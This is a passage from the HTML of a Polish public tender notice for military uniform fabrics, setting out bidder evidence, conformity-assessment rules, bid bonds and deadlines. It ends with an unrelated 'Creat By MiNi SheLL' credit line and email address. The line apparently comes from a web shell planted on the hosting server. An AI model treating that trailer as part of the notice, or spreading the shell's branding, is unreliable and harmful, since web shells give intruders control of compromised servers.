wyrobów<br/>przeznaczonych na potrzeby obronności państwa (tj. Dz.U. z2018 r. poz. 1385, z późn. zm.), lub tkaniny dla mundurów<br/>galowych i wyjściowych wyprodukowanych w ramach obowiązywania certyfikatów w latach poprzednich wraz z<br/>przedstawieniem aktualnych wyników badań z akredytowanych laboratoriów potwierdzających zgodność z wymaganiami<br/>UWAGA:<br/>ocena zgodności wyrobów z przypisanym trybem III, podlega zmianie na tryb I dla niżej wymienionych tkanin:<br/>• Tkanin na mundury galowe;<br/>• Tkanin na mundury wyjściowe;<br/>• Tkanin na mundury służbowe;<br/>• Tkanin na spodnie wyjściowe;<br/>• Tkanin na bluzy olimpijki.<br/>W związku z powyższym ww. tkaniny oceniane są w trybie I (art. 6 ust.1 pkt 1 ustawy<br/>z dnia 17 listopada 2006 r.) co oznacza, że podlegają ocenie zgodności obejmującej czynności wykonywane przez<br/>dostawcę (zgodnie z § 6 ust. 1 rozporządzenia Ministra Obrony Narodowej z dnia 11 stycznia 2013 r.) poprzez<br/>przeprowadzenie co najmniej jednej z niżej wymienionych czynności<br/> kontroli wyrobu w toku produkcji;<br/>II. kontroli i badań końcowych wyrobu;<br/>III. kontroli procesu wytwarzania wyrobu;<br/>IV. innych czynności określonych w specyfikacji technicznej potwierdzających<br/>zgodność wyrobu ze specyfikacją techniczną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed<br/>wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków<br/>dowodowych:<br/>1)odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym<br/>mowa w pkt 1) dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej,<br/>powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2),<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy,<br/>ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju,<br/>w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów<br/>o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być<br/>wystawiony odpowiednio jak w terminie wskazanym w pkt 2).<br/>4) do podmiotów udostępniających zasoby na zasadach określonych<br/>w art. 118 ustawy Pzp (jeżeli dotyczy) oraz podwykonawców niebędących podmiotami udostępniającymi zasoby na tych zasadach,<br/>mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, przepisy pkt 2) oraz 3) stosuje się<br/>odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:<br/>1) zaświadczenia wydanego przez Komendanta WOBWSM /Wojskowy Ośrodek Badawczo-Wdrożeniowy Służby Mundurowej/, jako<br/>podmiotu uprawnionego do oceny zgodności i kontroli jakości, o posiadaniu wzoru zakładowego wyrobu (PUiW) zgodnego w dniu<br/>uruchomienia postępowania o udzielenie zamówienia publicznego WDTT i wzorem do produkcji seryjnej (z datą wystawienia<br/>późniejszą od daty zatwierdzenia WDTT lub WTU),<br/>2) certyfikatu wystawionego przez jednostkę certyfikującą na dostawy PUiW, które podlegają ocenie zgodności w trybie III zgodnie z<br/>rozporządzeniem Ministra Obrony Narodowej z dnia 11 stycznia 2013 r. w sprawie szczegółowego wykazu wyrobów podlegających<br/>ocenie zgodności oraz sposobu i trybu przeprowadzenia oceny zgodności wyrobów przeznaczonych na potrzeby obronności<br/>państwa (tj. Dz.U. z2018 r. poz. 1385, z późn. zm.), lub tkaniny dla mundurów galowych i wyjściowych wyprodukowanych w ramach<br/>obowiązywania certyfikatów w latach poprzednich wraz z przedstawieniem aktualnych wyników badań z akredytowanych<br/>laboratoriów potwierdzających zgodność z wymaganiami.<br/>UWAGA:<br/>ocena zgodności wyrobów z przypisanym trybem III, podlega zmianie na tryb I dla niżej wymienionych tkanin:<br/>• Tkanin na mundury galowe;<br/>• Tkanin na mundury wyjściowe;<br/>• Tkanin na mundury służbowe;<br/>• Tkanin na spodnie wyjściowe;<br/>• Tkanin na bluzy olimpijki.<br/>W związku z powyższym ww. tkaniny oceniane są w trybie I (art. 6 ust.1 pkt 1 ustawy<br/>z dnia 17 listopada 2006 r.) co oznacza, że podlegają ocenie zgodności obejmującej czynności wykonywane przez dostawcę<br/>(zgodnie z § 6 ust. 1 rozporządzenia Ministra Obrony Narodowej z dnia 11 stycznia 2013 r.) poprzez przeprowadzenie co najmniej<br/>jednej z niżej wymienionych czynności:<br/>I. kontroli wyrobu w toku produkcji;<br/>II. kontroli i badań końcowych wyrobu;<br/>III. kontroli procesu wytwarzania wyrobu;<br/>IV. innych czynności określonych w specyfikacji technicznej potwierdzających<br/>zgodność wyrobu ze specyfikacją techniczną.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia wraz z ofertą przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z art. 117 ust. 4 ustawy Pzp w przypadku, o którym mowa w Rozdziale VIII ust. 1 pkt 2), Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy (wzór - załącznik nr 5 do SWZ) – należy złożyć w przypadku określenia przez Zamawiającego<br/>warunków udziału w postępowaniu określonych w Rozdziale VIII ust. 1 pkt 2 SWZ.<br/>2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w części zamówienia nr 1, 2<br/>Wniesienie wadium.<br/>1) Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a) dla części zamówienia nr 1 – 1 700,00 PLN;<br/>b) dla części zamówienia nr 2 – 1 600,00 PLN;<br/>Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w ust. 1<br/>składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postepowaniu.<br/>2. Zgodnie z art. 117 ust. 4 ustawy Pzp w przypadku, o którym mowa w Rozdziale VIII ust. 1 pkt 2) SWZ, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy (wzór - załącznik nr 5 do SWZ) – należy złożyć w przypadku określenia przez Zamawiającego<br/>warunków udziału w postępowaniu określonych w Rozdziale VIII ust. 1 pkt 2 SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za<br/>najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej<br/>za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje wprowadzenie zmian postanowień umowy dotyczące:<br/>a) dokonania zmian dotyczących rodzaju umundurowania w zależności od rodzaju Sił Zbrojnych oraz zmiany rodzaju fasonu<br/>umundurowania z męskiego na damski lub fasonu z damskiego na męski;<br/>b) zwiększenia zamówienia ilości poszczególnego asortymentu po cenach jednostkowych wynikających z umowy;<br/>c) przesunięć ilościowych zamawianego asortymentu w poszczególnych pozycjach<br/>w okresie obowiązywania umowy.<br/>3. Jeżeli wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-02 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-02 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji umowy 3 miesiące od daty zawarcia umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com